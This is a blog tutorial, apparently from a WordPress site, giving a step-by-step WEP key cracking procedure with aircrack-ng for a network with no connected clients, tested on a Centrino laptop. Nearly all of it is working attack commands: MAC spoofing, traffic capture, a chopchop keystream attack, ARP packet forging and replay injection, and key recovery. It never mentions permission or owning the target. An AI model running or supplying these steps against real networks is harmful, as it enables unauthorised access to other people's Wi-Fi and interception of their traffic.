Tutorial: WEP Crack / No Clients / IPW2200 (Centrino)

I know there are already about a thousand tutorials but I couldn’t find anything complete or up-to-date (or english). Also, please bear in mind that this is my first tutorial.

Before we begin the attack, we need to update and get some information. First update aircrack-ng to the latest version (0.9.1 for me).

I saved to a USB flash:
mount /dev/sda1 /mnt/sda_removable
cp /mnt/sda_removable/aircrack-ng-0.9.1.tar.gz ~

Or configure a network adaptor and d/l it (change X’s):
wget hXXp://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz

tar zxvf aircrack-ng-0.9.1.tar.gz
cd aircrack-ng
make
make install

We will also need to know the target’s name (ESSID),  MAC address, and the channel. Please note that my wireless device is “eth1” but yours may be different; use “iwconfig” to find out which adaptor is wireless. (If you downloaded aircrack-ng you may need to reset your network adaptor)
iwlist eth1 scan

Now we can get started. First we must enable rtap0 for listening. rtap0 is required (instead of just eth1) due to limitations in the ipw2200 driver.
rmmod ipw2200
modprobe ipw2200 rtap_iface=1

Next enable wireless and change MAC (changing MAC is optional).
ifconfig eth1 up hw ether 00:11:22:33:44:55

Configure wireless w/ essid, channel, and a fake key.
iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed

Now start collecting traffic on rtap0. “dump” is the name of the capture (.cap) file.
airodump-ng --bssid <AP MAC> -w dump rtap0

Now for the actual injection. Open a new terminal (<ctrl><alt><F2> if you are still in the console) and start the aireplay chopchop attack. Note the modifier “-i rtap0.” This tells aireplay to use rtap0 for listening and eth1 for injecting. Also “-4” is the type of attack (chopchop).
aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1

A prompt will ask you to use “this” packet. Type “y” and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like “replay_dec-######.xor”

Make sure there are no errors reported after using aireplay. This is where I had the most difficulty. If the attack doesn’t start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn’t match. I just re-ran aireplay and it was fine.

Now we will create an arp-request packet using the aquired keysteam file. The “-l” and “-k” options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP.
packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request

Finally we will send our newly created arp-request packet over and over. After this step you should see the “Data” begin to rise quickly back in the first terminal (airodump). If the data doesn’t change (usually between 80 and 350 per second) then something is wrong.
aireplay-ng -2 -r arp-request eth1

Let aireplay run for a few minutes while you collect data. After 75,000 or so you can run aircrack in a third terminal (<ctrl><alt><F3>). Within a few minutes you should have the key.
aircrack-ng -z dump*.cap

I hope this tutorial has proven helpful. Smiley

Test on my Dell inspiron 6000 (centrino) ram 1.2GB .

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: